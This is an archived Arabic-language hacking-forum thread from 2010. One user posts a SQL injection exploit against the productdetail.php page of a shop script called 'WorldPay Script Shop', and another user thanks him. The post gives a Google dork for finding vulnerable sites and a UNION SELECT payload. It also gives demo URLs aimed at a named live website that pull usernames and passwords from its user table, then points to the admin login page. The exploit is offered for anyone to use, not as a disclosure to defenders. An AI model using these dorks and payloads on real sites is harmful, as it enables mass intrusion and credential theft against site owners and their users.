المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : WorldPay SQL Injection



kad2006
01-04-2010, 11:19 PM
السلام عليكم
تفضلو الثغره الجديده ;)



============================================
| WorldPay Script Shop (productdetail) SQL Injection Vulnerability
============================================

=====================================
~~~~~~~~~~~~~~~~~~~~
dork (Google): intext:"Powered By WorldPay" inurl:productdetail.php
~~~~~~~~~~~~~~~~~~~~
Exploit : Site /path/productdetail.php?id=-231+union+select+1,2,3,4,5--
And you come the enject ,,
Demo :-
User name : www.watch2trade.co.uk/productdetail.php?id=-231+union+select+1,2,3,userName,5+from+watch2td_db .tbl_users--
Password : www.watch2trade.co.uk/productdetail.php?id=-231+union+select+1,2,3,password,5+from+watch2td_db .tbl_users--
admin Login : Site /path/login.php
================================================== ===========
#====GreeTZ===============#
#
#======================#

منقول بعنف

BLACK.JaGuAr
01-05-2010, 03:36 PM
مشكور والله يعيطك العافية وبانتظار جديدك تحياتي لك